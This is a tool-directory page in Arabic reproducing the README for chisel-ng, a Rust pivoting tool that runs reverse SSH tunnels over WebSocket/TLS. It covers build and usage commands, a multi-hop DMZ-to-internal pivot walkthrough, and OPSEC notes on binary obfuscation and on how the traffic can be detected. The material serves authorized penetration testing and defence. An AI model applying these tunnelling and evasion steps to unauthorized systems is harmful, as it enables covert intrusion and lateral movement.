Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chisel-ng — الجيل الجديد من Chisel، مكتوب بلغة Rust. SSH عبر WSS مع بعض التخصيصات. | Kitploit
أدوات/GitHubGitHub/nullsection/chisel-ng
التهرب من IDS/IPSالحركة الجانبيةما بعد الاستغلالأمن الشبكاتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubnullsection/chisel-ng

chisel-ng

الجيل الجديد من Chisel، مكتوب بلغة Rust. SSH عبر WSS مع بعض التخصيصات.

عرض المستودع
1369منذ 6 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

| | ()___ | | _ __ __ _ / | ' | / |/ _ \ || ' \ / ` | | (__| | | | _ \ / || | | | (| | _|| |||/_|| || ||_, | |___/

chisel-ng

Rust License Windows Linux

تطبيق Rust لأداة chisel لاختبار الاختراق وعمليات الفريق الأحمر. ينشئ أنفاقًا عكسية عبر SSH عبر WebSocket عبر TLS، مما يسمح للمشغلين بالتنقل عبر المضيفين المخترقين مع الاندماج مع حركة HTTPS العادية.


جدول المحتويات

  • بداية سريعة
  • الميزات
  • الهندسة المعمارية
  • مرجع الاستخدام
    • الخادم (المشغل)
    • العميل العكسي (الوكيل)
    • العميل الملزم (الوكيل - وضع الداخل)
    • أوامر واجهة الخادم
  • التنقل عبر عدة قفزات
  • تفاصيل تقنية
  • اعتبارات OPSEC
  • إخلاء مسؤولية

بداية سريعة

المتطلبات

  • Rust 1.70+ (rustup.rs)

البناء

root@kitploit:~
git clone https://github.com/nullsection/chisel-ng
cd chisel-ng
cargo build --release

تخرج الملفات التنفيذية إلى target/release/: chisel-server، chisel-client، chisel-bind-client

الاستخدام الأساسي

1. تشغيل الخادم (المشغل):

root@kitploit:~
./chisel-server -p 'secret' -v

2. تشغيل العميل (الهدف):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

3. إنشاء الأنفاق:

root@kitploit:~
chisel-ng> session 1
[session-1] TARGET > tunnel 8080:192.168.1.100:80
[session-1] TARGET > socks5 1080

4. الوصول إلى الخدمات الداخلية:

root@kitploit:~
curl http://127.0.0.1:8080
curl --socks5 127.0.0.1:1080 http://internal.corp/

الميزات

  • SSH عبر WebSocket عبر TLS - الاندماج مع حركة HTTPS العادية
  • مصادقة مفتاح مشترك مسبقًا - مصادقة بسيطة وآمنة
  • إعادة توجيه المنافذ الديناميكي - إنشاء الأنفاق حسب الطلب
  • وكيل SOCKS5 - التوجيه الديناميكي عبر الوكلاء
  • وضعان للعميل - عكسي (يتصل بالخارج) وملزم (يقبل الاتصالات الواردة)
  • عبر المنصات - ويندوز ولينكس

الهندسة المعمارية

root@kitploit:~
+------------------+              +----------------------------------+
|     المشغل       |              |         الشبكة المستهدفة         |
|                  |              |                                  |
| +--------------+ |     SSH      | +--------------+                 |
| |chisel-server |<---------------+-|chisel-client |                 |
| |    :8443     | |   (عبر TLS)  | |  (عكسي)      |                 |
| +--------------+ |              | +--------------+                 |
+------------------+              +----------------------------------+

مكدس البروتوكول:

root@kitploit:~
TCP -> TLS 1.3 -> WebSocket -> SSH -> بيانات النفق
                     ^
            يظهر كـ HTTPS

أوضاع العميل:

  • عكسي (chisel-client) - يتصل بالخادم (اتصال صادر)
  • ملزم (chisel-bind-client) - يستمع للاتصالات الواردة؛ يستخدم الخادم الأمر connect

مرجع الاستخدام

الخادم (المشغل)
root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      عنوان الاستماع [الافتراضي: 0.0.0.0:8443]
    -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
        --cert <FILE>        شهادة TLS (PEM)
        --key <FILE>         المفتاح الخاص لـ TLS (PEM)
        --generate-psk       إنشاء PSK عشوائي والخروج
    -v, --verbose            إخراج مفصل
العميل العكسي (الوكيل)
root@kitploit:~
OPTIONS:
    -s, --server <ADDR>      عنوان الخادم (host:port)
    -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
    -u, --user <LABEL>       تسمية الجلسة [الافتراضي: agent]
    -k, --insecure           تخطي التحقق من TLS
        --no-reconnect       تعطيل إعادة الاتصال التلقائي
    -i, --interval <SECS>    فترة إعادة الاتصال [الافتراضي: 30]
        --heartbeat <SECS>   فترة نبضات القلب [الافتراضي: 30]
    -v, --verbose            إخراج مفصل
العميل الملزم (الوكيل - وضع الداخل)

للأهداف التي يمكنها قبول الاتصالات الواردة ولكن لا يمكنها بدء الاتصالات الصادرة:

root@kitploit:~
OPTIONS:
    -l, --listen <ADDR>      عنوان الاستماع (مثال: 0.0.0.0:9000)
    -p, --psk <PSK>          المفتاح المشترك مسبقًا أو كلمة المرور [متغير بيئة: CHISEL_PSK]
    -u, --user <LABEL>       تسمية الجلسة [الافتراضي: agent]
    -k, --insecure           تخطي التحقق من TLS
        --heartbeat <SECS>   فترة نبضات القلب [الافتراضي: 30]
    -v, --verbose            إخراج مفصل
أوامر واجهة الخادم

القائمة الرئيسية:

root@kitploit:~
sessions             عرض الجلسات المتصلة
session <id>         تحديد جلسة
connect <ip:port>    الاتصال بعميل ملزم
disconnect <id>      قطع الجلسة (سيتم إعادة الاتصال)
kill <id>            إنهاء عملية العميل

قائمة الجلسة:

root@kitploit:~
tunnel <local>:<target_ip>:<target_port>    إنشاء نفق
tunnel --local <local>:<target>:<port>      إنشاء نفق (localhost فقط)
tunnel stop <port>                          إيقاف النفق
tunnels                                     عرض الأنفاق
socks5 <port>                               بدء وكيل SOCKS5
socks5 stop <port>                          إيقاف وكيل SOCKS5
ping                                        قياس زمن الوصول
ps                                          عرض العمليات البعيدة
netstat                                     عرض الاتصالات البعيدة

التنقل عبر عدة قفزات

الوصول إلى الشبكات المعزولة عن طريق ربط الجلسات الموجودة.

السيناريو: مضيف DMZ يمكنه الوصول إلى المشغل. المضيف الداخلي (10.0.0.50) يمكن الوصول إليه فقط من DMZ.

root@kitploit:~
+----------+        +-----------+        +------------+
| المشغل  |---SSH---| جلسة 1    |---TCP--| جلسة 2     |
|  الخادم  |        |   (DMZ)   |        | (داخلي)  |
+----------+        +-----------+        +------------+

الخطوة 1 - تشغيل الخادم (المشغل):

root@kitploit:~
./chisel-server -p 'secret' -v

الخطوة 2 - تشغيل العميل العكسي (مضيف DMZ):

root@kitploit:~
./chisel-client -s operator.example.com:8443 -p 'secret' -k

الخطوة 3 - تشغيل العميل الملزم (المضيف الداخلي عند 10.0.0.50):

root@kitploit:~
./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k

الخطوة 4 - إنشاء نفق والاتصال (واجهة الخادم):

root@kitploit:~
chisel-ng> session 1
[session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
تم بدء النفق على 127.0.0.1:9000

[session-1] DMZ > back
chisel-ng> connect 127.0.0.1:9000
تم تسجيل الجلسة 2

chisel-ng> session 2
[session-2] INTERNAL > socks5 1080

تفاصيل تقنية

كيف تعمل الأنفاق

عند إنشاء نفق (tunnel 8080:192.168.1.100:80):

  1. يربط الخادم المنفذ المحلي 8080
  2. عند الاتصال، يرسل الخادم طلب CONNECT إلى الوكيل
  3. يتصل الوكيل بالهدف ويفتح قناة SSH direct-tcpip
  4. يمرر البيانات في كلا الاتجاهين
كيف يعمل SOCKS5

وجهات ديناميكية عبر مصافحة RFC 1928. يعيد رموز خطأ مناسبة لنتائج مسح المنافذ الدقيقة.


اعتبارات OPSEC

تعزيز الملف التنفيذي

إصدارات الإصدار معززة:

  • تشغيل صامت - يتم تحويل جميع السجلات إلى عمليات لا تفعل شيئًا
  • تعتيم السلاسل - سلاسل البروتوكول مشفرة بـ XOR عند وقت الترجمة
  • إزالة الرموز - لا توجد رموز تصحيح أو مسارات مصدرية
  • تحسين الحجم - ~3 ميجابايت مقابل ~15 ميجابايت لإصدار التصحيح
  • سلوك الذعر - الإجهاض الفوري، لا توجد تتبعات للمكدس
الأمن التشغيلي
  • مصادقة PSK - مفتاح 256 بت من كلمة المرور (SHA-256) أو سداسي عشري خام
  • لا تخزين للبيانات الاعتمادية - PSK عبر وسيطة أو متغير بيئة فقط
  • إعادة الاتصال التلقائي - مفعل افتراضيًا، فترة قابلة للتكوين
  • نبضات القلب - إبقاء الاتصال حيًا قابل للتكوين، تعطيل باستخدام --heartbeat 0
نواقل الكشف
  • بصمة TLS JA3/JA4
  • أنماط ترقية WebSocket
  • مدة الاتصال الطويلة
  • فترات نبضات القلب الثابتة

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الأمان المصرح به فقط. احصل على التفويض المناسب قبل الاستخدام. المؤلفون ليسوا مسؤولين عن سوء الاستخدام.


الترخيص

MIT

تنزيل الأداة